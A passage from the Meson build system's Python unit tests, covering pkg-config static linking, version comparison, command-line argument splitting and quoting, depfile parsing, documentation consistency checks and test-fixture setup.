create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
env.scratch_dir = tmpdir
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.BUILTIN_OPTIONS.keys(),
*mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple(str, str)]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
from pprint import pprint
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
